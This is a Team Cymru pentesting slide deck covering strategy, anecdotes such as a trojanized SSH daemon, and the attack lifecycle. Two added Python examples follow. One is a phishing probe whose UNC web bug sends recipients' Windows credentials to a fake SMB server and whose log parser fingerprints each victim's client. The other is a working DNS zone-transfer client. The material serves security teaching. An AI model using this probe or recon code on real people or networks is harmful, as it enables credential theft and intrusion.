Team Cymru Penetration Testing Ryan Connolly, ryan@cymru.com <http://www.cymru.com>
Penetration Testing Agenda • Pentesting Basics – Pentesting Defined – Vulnerability Scanning vs. Penetration testing • Pentesting Strategy • Anecdotes from real pentests • Conducting a good vulnerability scan – Footprint, Scan, Enumerate, Gain Access, Escalate, Pilfer, Cover Track, Create Backdoor – Demos • Review
Why Penetration Testing? • Financial institutions must secure their networks in order to maintain the security of the entire financial system • But with no ability to assess risk organizations are flying blind • IT Security assessments are done today with a mixture of Vulnerability Scanning and Penetration Testing
What is Penetration Testing?
Dave’s new job as a Pen Tester wasn’t anything at all like he’d expected
Penetration Testing Attempt to compromise security by using the same techniques of the attacker – If I was an attacker, how far would I be able to go? – How easy is it to compromise this computer | network | application | system ?
Vulnerability Scanning or Penetration Testing?
Vulnerability Scanning Look for evidence of – Vulnerable software versions – Presence or lack of patches – Misconfiguration
The “bad guys” don’t run Nessus
Vulnerability Scanning alone is not sufficient • Does not tell you what an attacker can do to your network today • Does not identify dangerous trust relationships between components • Lots of false-positives are produced – Must be manually verified • Only actionable items are list of missing patches
Organizations should take advantage of both VS and PT • VS provides a baseline from which to start building a risk profile • A Penetration Test illustrates what those vulnerabilities mean to the organization today, and can help verify remediation efforts • The financial system cannot afford for institutions not to perform periodic Penetration Tests
Key elements of a Penetration Test • Discover and exploit vulnerabilities throughout the network • Leverage trust-relationships among components • Access critical information
Example “After exploiting a vulnerability in the Exchange server, we were able to collect a list of valid email users and passwords. We then used this server to attack the database server in the DMZ (which wasn’t visible from the outside). One of the exploits was successful and we gained administrator access to the server, including complete access to all tables in the customers database.”
A good pen-test • Covers all relevant attack vectors • Clearly shows how vulnerable assets can be compromised • Tests the system as a whole, including existing defense mechanisms • Documents all activities performed
Common mistakes organizations make when doing PT • Limit the test to running a vulnerability scanner • Testing components in isolation • Company changes environment while test is being performed • Overlooking critical relationships, such as suppliers, partners and outsourcing/offshoring vendors
Signs that a test wasn’t thorough • Limited to small subset of network • Produced a laundry list of vulnerabilities, with no additional verification • No interpretation of findings, or “hand waving” • No recommendations beyond list of missing vendor patches • Lack of detailed activity logs, and/or problems with clean-up
Pentesting Strategy How much testing is good enough?
Managing Risk [chart: axes labelled Risk and Money]
It is always possible to hack a network • It just depends on how hard you try • But smart companies – Invest in technology and processes that help them reduce the most risk, with the least amount of resources – Assume they will be hacked eventually and prepare accordingly
How often can we test cost-effectively? • Penetration Testing was traditionally done once or twice a year due to high cost of service • Automated Penetration Testing software is enabling organizations today to test more often – 75% of IMPACT customers doing testing on a monthly and weekly basis, in contrast with 50% doing it once or twice a year in late 2004
Security as an emergent property The security of a system is determined by the security of each of its components individually and of the system as a whole
Organizations are getting better at • Deploying OS updates on high-profile public servers • Hardening network services on public servers • Securing the perimeter with properly configured firewalls and routers
Penetrating a network through its perimeter is much more difficult today than it was 5 years ago
Organizations still have trouble with • Client side security • Custom web applications • Internal security • Dealing with continuous change and an ever- expanding network of partners, customers and suppliers
Attackers are not standing still • Industry data points to significant increase in the prevalence and criticality of client-side vulnerabilities – A “shift” towards finding vulnerabilities in client-side software is occurring (SANS and Symantec security threat reports) – 8 out of 20 categories in latest SANS Top 20 report relate directly to client-side vulnerabilities – High profile incidents taking advantage of vulnerabilities in client-side software • Windows Metafile image exploit in MySpace.com ad deploys trojan on compromised computers (July 06) • Organizations with good perimeter security are still wide open to attacks against client-side vulnerabilities
Client Side Vulnerabilities • Vulnerabilities in client-side software – IE, Firefox, Outlook, Thunderbird, MSN Messenger, AOL IM, ICQ, Media Players, and image and document readers/processors • Examples – IE devenum.dll COM Object vulnerability (MS05-038) – MSN messenger PNG Processing vulnerability (MS05-009) – Windows WMF vulnerability (KB912840) • Remote/Local, High/Medium/Low? – No good fit in current vulnerability taxonomies
The user’s workstation • is less protected & more complex than the publicly available servers • has legitimate access to the network’s critical assets • connects the Internet with the internal network
Internal network still wide open • Security much more relaxed than on public facing servers – Internal computers are not patched correctly even though automated patch mgmt is in place • Less (sometimes non-existent) network segmentation • Plenty of trust relationships that can be leveraged
Random anecdotes from real pen tests
Pen Test #1 • Collected valid email addresses using a badly configured SMTP server and a list of common names in various languages • Spammed targets with email probe – Web bug in <img> to fingerprint targets – UNC web bug to force authentication with a fake SMB server • Exploited Java vulnerability
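The e-mail probe from Pen Test #1, as an added example that is not part of the original deck: each recipient gets a unique token in two 1x1 images, an HTTP one that reports the mail client's User-Agent back to a tester-controlled web server, and a UNC/file: one that makes clients willing to fetch it authenticate to a fake SMB server. A correlation routine then maps log hits back to recipients and makes a coarse OS/client guess. The host names, the secret, the recipient addresses and the log lines are all constructed for the example; note that current mail clients block remote images by default and refuse file: references, so the probe mostly works against the kind of 2006-era clients the slide is describing.

```python
# Added example (not from the Team Cymru deck): per-recipient e-mail probe
# and log correlation.  Hosts, secret, recipients and log lines are constructed.
import hashlib
import hmac
import re

PROBE_HOST = "probe.example.net"   # assumption: web server the tester controls
SMB_HOST = "203.0.113.7"           # assumption: tester's fake SMB server (collects NTLM auth)
SECRET = b"engagement-2006-07"     # assumption: per-engagement key; keeps tokens unguessable


def token_for(recipient):
    """Stable, unguessable token for one recipient (HMAC of the lower-cased address)."""
    return hmac.new(SECRET, recipient.lower().encode(), hashlib.sha256).hexdigest()[:16]


def probe_html(recipient):
    """The two web bugs from the slide: an HTTP <img> that reports back the mail
    client's User-Agent, and a UNC/file: <img> that makes clients willing to
    fetch it authenticate to the fake SMB server (modern clients refuse this)."""
    tok = token_for(recipient)
    return (
        "<html><body><p>Hello,</p>"
        f'<img src="http://{PROBE_HOST}/i/{tok}.gif" width="1" height="1">'
        f'<img src="file://{SMB_HOST}/share/{tok}.gif" width="1" height="1">'
        "</body></html>"
    )


# Constructed probe-server log lines: client IP, timestamp, request, status,
# bytes, User-Agent (referer column omitted).  Tokens come from token_for().
SAMPLE_LOG = "\n".join([
    f'198.51.100.23 - - [18/Jul/2006:09:14:02 +0000] "GET /i/{token_for("alice@example.com")}.gif HTTP/1.1" 200 43 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '198.51.100.23 - - [18/Jul/2006:09:14:03 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-"',
    '198.51.100.99 - - [18/Jul/2006:09:15:40 +0000] "GET /i/deadbeefdeadbeef.gif HTTP/1.1" 404 0 "curl/7.15.0"',
    f'198.51.100.41 - - [18/Jul/2006:09:20:11 +0000] "GET /i/{token_for("bob@example.com")}.gif HTTP/1.1" 200 43 '
    '"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060608 Thunderbird/1.5.0.4"',
])

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET /i/([0-9a-f]+)\.gif[^"]*" \d+ \d+ "([^"]*)"$')

OS_HINTS = [("Windows NT 5.1", "Windows XP"), ("Windows NT 5.0", "Windows 2000"),
            ("Windows NT 6.0", "Windows Vista"), ("Linux", "Linux"), ("Mac OS X", "Mac OS X")]
CLIENT_HINTS = [("Thunderbird", "Thunderbird"), ("Firefox", "Firefox"),
                ("MSIE", "IE/Outlook (MSHTML)")]


def classify_ua(ua):
    """Coarse OS/client guess from a User-Agent string; 'unknown' when no hint matches."""
    os_name = next((name for hint, name in OS_HINTS if hint in ua), "unknown")
    client = next((name for hint, name in CLIENT_HINTS if hint in ua), "unknown")
    return {"os": os_name, "client": client, "user_agent": ua}


def correlate(log_text, recipients):
    """Map probe hits back to recipients; unknown tokens (scanners, guesses) are dropped."""
    by_token = {token_for(r): r for r in recipients}
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group(3) not in by_token:
            continue
        ip, when, tok, ua = m.groups()
        hits.append({"recipient": by_token[tok], "ip": ip, "time": when, **classify_ua(ua)})
    return hits


if __name__ == "__main__":
    for hit in correlate(SAMPLE_LOG, ["alice@example.com", "bob@example.com"]):
        print(hit["recipient"], hit["ip"], hit["os"], hit["client"])
```

The HMAC token matters in practice: a sequential or guessable token lets a curious recipient, or a scanner, hit other recipients' URLs and pollute the fingerprint data, which is why `correlate` drops any token it did not issue.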
Pen Test #2 • Collected e-mail addresses by searching MIT’s PGP key server and Internet newsgroups – Some mail archives had complete email headers • Created profile of each user – Workstation details: OS, browser, MUA – Personal details: hobbies, favorites, contacts, level of computer proficiency • Segmented attack and customized emails based on profile
Pen Test #2b • 1 single email produced about 40 different successful compromises in a matter of minutes • Done by hitting an e-mail alias for a mailing list
Pen Test #3 • Target network divided into two different company branches • Launched exploits against both subnets. Exploits against the 1st failed, but against the 2nd succeeded • Company had network intrusion prevention active on one side of the network but not on the other
Pen Test #4 • Compromised ad-hoc test server with old exploit • Replaced SSH daemon with trojan • Collected usernames and passwords that were valid on other more important servers on the network
Simple attacks still work • Sent trojanized executable as menu for new Pizzeria • Engage in conversation via IM and send a trojan • Fedex “sample CD-ROMs” with active content
The Pentesting Process Think like the bad guys: use the same process. Consider: 1. Social engineering factor 2. Technical factor 3. Iterative learning
Pentesting Vulnerability Scanning Now that we’ve talked about not just doing vulnerability scans, let’s talk about… Vulnerability scanning!
Network attack process 1. Footprint 2. Scan 3. Enumerate 4. Gain Access 5. Escalate 6. Pilfer 7. Cover Tracks 8. Create Backdoor
Footprinting • Techniques: – Open source search – whois – DNS zone transfers • Tools: – Usenet, search engines – networksolutions.com, other registrars – nslookup, dig • Objective: – IP addresses – Domain names
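The DNS zone transfer check from the Footprinting slide, as an added example that is not part of the original deck: a stdlib-only AXFR client (the same request `dig axfr example.com @ns1` sends) with a small wire-format parser, and a `footprint` helper that reduces the zone to the two things the slide is after, hostnames and IP addresses. AXFR runs over TCP, and the answer is a run of messages that starts and ends with the zone's SOA record, so the client reads until it has seen the SOA twice. Properly configured servers answer REFUSED, which the client reports as "not allowed" rather than as an error. The `example.com` zone, the server addresses and the `SAMPLE_AXFR_MESSAGE` bytes are constructed test data.

```python
# Added example (not from the Team Cymru deck): minimal AXFR client + parser.
# Zone names, addresses and the sample response below are constructed.
import socket
import struct

TYPE_A, TYPE_NS, TYPE_CNAME, TYPE_SOA, TYPE_AXFR = 1, 2, 5, 6, 252
TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """Wire-format a domain name as length-prefixed labels (no compression)."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    """12-byte header (1 question, no flags) + QNAME + QTYPE=AXFR + QCLASS=IN."""
    return (struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
            + encode_name(zone) + struct.pack(">HH", TYPE_AXFR, 1))


def decode_name(msg, offset):
    """Read a name at offset, following RFC 1035 compression pointers.
    Returns (dotted name, offset just past the name as it appeared in the stream)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                  # 2-byte pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack(">H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels) + ".", (end if jumped else offset)


def parse_records(msg):
    """Return (rcode, [(owner, type, value), ...]) for every RR in one DNS message."""
    _, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    offset = 12
    for _ in range(qd):                            # skip the echoed question
        _, offset = decode_name(msg, offset)
        offset += 4
    records = []
    for _ in range(an + ns + ar):
        owner, offset = decode_name(msg, offset)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == TYPE_A and rdlen == 4:
            value = ".".join(str(b) for b in msg[offset:offset + 4])
        elif rtype in (TYPE_NS, TYPE_CNAME, TYPE_SOA):   # SOA: first field is MNAME
            value, _ = decode_name(msg, offset)
        else:
            value = msg[offset:offset + rdlen].hex()
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), value))
        offset += rdlen
    return flags & 0xF, records


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return buf


def zone_transfer(zone, nameserver, timeout=5.0):
    """Try AXFR over TCP/53 (AXFR is TCP-only). Returns (allowed, records).
    A full transfer begins and ends with the zone SOA, so read until the 2nd SOA."""
    query = build_axfr_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((nameserver, 53), timeout=timeout) as sock:
        sock.sendall(struct.pack(">H", len(query)) + query)
        while soa_seen < 2:
            length = struct.unpack(">H", _recv_exact(sock, 2))[0]
            rcode, rrs = parse_records(_recv_exact(sock, length))
            if rcode != 0 or not rrs:              # REFUSED (5) is the usual "no"
                return False, records
            records.extend(rrs)
            soa_seen += sum(1 for r in rrs if r[1] == "SOA")
    return True, records


def footprint(records):
    """Collapse a zone into sorted hostnames (A/CNAME owners) and IPv4 addresses."""
    hosts = sorted({o for o, t, _ in records if t in ("A", "CNAME")})
    ips = sorted({v for _, t, v in records if t == "A"})
    return hosts, ips


# Constructed sample: one AXFR message a permissive server might send for example.com.
def _rr(owner_wire, rtype, rdata, ttl=300):
    return owner_wire + struct.pack(">HHIH", rtype, 1, ttl, len(rdata)) + rdata

_SOA = _rr(encode_name("example.com"), TYPE_SOA,
           encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
           + struct.pack(">IIIII", 2006071801, 3600, 900, 604800, 300))
SAMPLE_AXFR_MESSAGE = (
    struct.pack(">HHHHHH", 0x1234, 0x8400, 1, 5, 0, 0)      # QR + AA, 1 question, 5 answers
    + encode_name("example.com") + struct.pack(">HH", TYPE_AXFR, 1)
    + _SOA
    + _rr(b"\xc0\x0c", TYPE_NS, encode_name("ns1.example.com"))   # owner = pointer to QNAME
    + _rr(encode_name("www.example.com"), TYPE_A, bytes([192, 0, 2, 10]))
    + _rr(encode_name("intranet.example.com"), TYPE_A, bytes([10, 1, 2, 3]))
    + _SOA
)

if __name__ == "__main__":
    print(footprint(parse_records(SAMPLE_AXFR_MESSAGE)[1]))
    # live use: zone_transfer("example.com", "192.0.2.53")  (constructed address)
```

Run `zone_transfer` once per authoritative server, not once per zone: the slide's point is that the weak link is often a secondary (or a forgotten internal) name server that still allows transfers after the primary has been locked down. The `intranet` record with an RFC 1918 address in the sample is the kind of leak that makes a zone transfer valuable to an attacker even when every listed host is firewalled.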